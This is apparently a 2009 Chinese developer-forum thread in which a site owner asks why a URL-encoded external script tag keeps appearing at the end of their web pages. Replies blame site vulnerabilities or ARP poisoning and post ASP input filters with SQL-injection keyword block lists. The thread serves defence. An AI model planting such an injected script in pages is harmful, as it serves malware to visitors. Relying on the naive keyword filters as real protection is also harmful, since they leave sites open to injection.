28,391
社区成员
发帖
与我相关
我的任务
分享服务器中的网页文件为何总是被改写呢?(有人说“ 程序存在漏洞,被别人挂马”)
服务器中的网页文件为何总是被改写呢?我在网页文件中的末尾处总发现这样的脚本代码:“<script src=http://%62%62%67%31%2d%63%6e></script>”
有人说“ 程序存在漏洞,被别人挂马”, ,这是什么原因?什么漏洞导致的这样问题?
有人说“ 程序存在漏洞,被别人挂马”, ,这是什么原因?什么漏洞导致的这样问题?
...全文
请发表友善的回复…
发表回复
ziyuanxian 2009-03-18
- 打赏
- 举报
要么是服务器有问题,要么是你网站有漏洞
lzp4881 2009-03-18
- 打赏
- 举报
http://hi.baidu.com/lz0830/blog/item/f5057c226aaee4f4d6cae264.html
chang1216 2009-03-18
- 打赏
- 举报
加上防注啊
Function SafeRequest(ParaName,ParaType)
Dim ParaValue
ParaValue=Trim(Request(ParaName))
if ParaValue <> "" then
If ParaType = 1 then
If not isNumeric(ParaValue) then
AlertErr("参数类型出错:" & ParaName & "必须为数字型!")
Response.end
End if
Else
ParaValue=SqlFilter(Replace(ParaValue,"'","''"))
End if
end if
SafeRequest=ParaValue
End Function
用这个函数 判断request的值 是否为 数字型
然后
Dim Query_Badword,Form_Badword,a,Err_Message,Err_Web,name
Query_Badword="'‖select‖update‖chr‖delete‖%20from‖;‖insert‖mid‖master.‖set‖chr(37)‖=‖exec‖SELECT‖UPDATE‖CHR‖DELETE‖%20FROM‖INSERT‖MID‖MASTER.‖SET‖CHR(37)‖EXEC"
Form_Badword="'‖%‖*‖&‖=‖ <‖>‖'‖and‖cmd‖|‖-‖_‖AND‖DMD"
On Error Resume Next
if request.QueryString <>"" then
Chk_badword=split(Query_Badword,"‖")
FOR each Query_Name in Request.QueryString
for a=0 to ubound(Chk_badword)
If Instr(LCase(request.QueryString(Query_Name)),Chk_badword(a)) <>0 Then
Response.Write "·出错了!参数"&name&"的值中包含非法字符串!"
Response.End
End If
next
NEXT
End if
'-----对 post 表 单值的过滤.
if request.form <>"" then
Chk_badword=split(Form_Badword,"‖")
FOR each name in Request.Form
for a=0 to ubound(Chk_badword)
If Instr(LCase(request.form(name)),Chk_badword(a)) <>0 Then
Response.Write "·出错了!表单"&name&"的值中包含非法字符串! <br>·请不要在表单中出现: % & * < > 等非法字符!"
Response.End
End If
next
NEXT
end if
Function SafeRequest(ParaName,ParaType)
Dim ParaValue
ParaValue=Trim(Request(ParaName))
if ParaValue <> "" then
If ParaType = 1 then
If not isNumeric(ParaValue) then
AlertErr("参数类型出错:" & ParaName & "必须为数字型!")
Response.end
End if
Else
ParaValue=SqlFilter(Replace(ParaValue,"'","''"))
End if
end if
SafeRequest=ParaValue
End Function
用这个函数 判断request的值 是否为 数字型
然后
Dim Query_Badword,Form_Badword,a,Err_Message,Err_Web,name
Query_Badword="'‖select‖update‖chr‖delete‖%20from‖;‖insert‖mid‖master.‖set‖chr(37)‖=‖exec‖SELECT‖UPDATE‖CHR‖DELETE‖%20FROM‖INSERT‖MID‖MASTER.‖SET‖CHR(37)‖EXEC"
Form_Badword="'‖%‖*‖&‖=‖ <‖>‖'‖and‖cmd‖|‖-‖_‖AND‖DMD"
On Error Resume Next
if request.QueryString <>"" then
Chk_badword=split(Query_Badword,"‖")
FOR each Query_Name in Request.QueryString
for a=0 to ubound(Chk_badword)
If Instr(LCase(request.QueryString(Query_Name)),Chk_badword(a)) <>0 Then
Response.Write "·出错了!参数"&name&"的值中包含非法字符串!"
Response.End
End If
next
NEXT
End if
'-----对 post 表 单值的过滤.
if request.form <>"" then
Chk_badword=split(Form_Badword,"‖")
FOR each name in Request.Form
for a=0 to ubound(Chk_badword)
If Instr(LCase(request.form(name)),Chk_badword(a)) <>0 Then
Response.Write "·出错了!表单"&name&"的值中包含非法字符串! <br>·请不要在表单中出现: % & * < > 等非法字符!"
Response.End
End If
next
NEXT
end if
村部 2009-03-18
- 打赏
- 举报
前两年我也出现过这个问题,先把原文件备份出来,再杀毒。对原代码文件用批处理替换“<script src=http://%62%62%67%31%2d%63%6e> </script>” 为空格即可。
icefire_love 2009-03-18
- 打赏
- 举报
1>在程序里多加几个判断,或许解决一些问题.
2>有问题及时决绝啊,
3>加上头文件
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="expires" content="0">
<meta http-equiv="keywords" content="keyword1,keyword2,keyword3">
<meta http-equiv="description" content="This is my page">
2>有问题及时决绝啊,
3>加上头文件
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="expires" content="0">
<meta http-equiv="keywords" content="keyword1,keyword2,keyword3">
<meta http-equiv="description" content="This is my page">
lanseshenying 2009-03-18
- 打赏
- 举报
1)如果你服务器上的程序文件全部被改写过,那就是你的网站程序中被上传了木马程序了。你要找出它,然后删除掉。
对文件上传或图片等上传的地方,多加判断,最好把上传图片的文件夹加上权限,去除“纯脚本运行”权限,改成“无”
2)如果你在游览器中访问网站,网站页面的源代码被加入这一行,但在服务器上的程序并没有被改动过,那么,就是服务器所在的局域网中的某台机器中了ARP病毒。可以和机房联系,处理。
对文件上传或图片等上传的地方,多加判断,最好把上传图片的文件夹加上权限,去除“纯脚本运行”权限,改成“无”
2)如果你在游览器中访问网站,网站页面的源代码被加入这一行,但在服务器上的程序并没有被改动过,那么,就是服务器所在的局域网中的某台机器中了ARP病毒。可以和机房联系,处理。
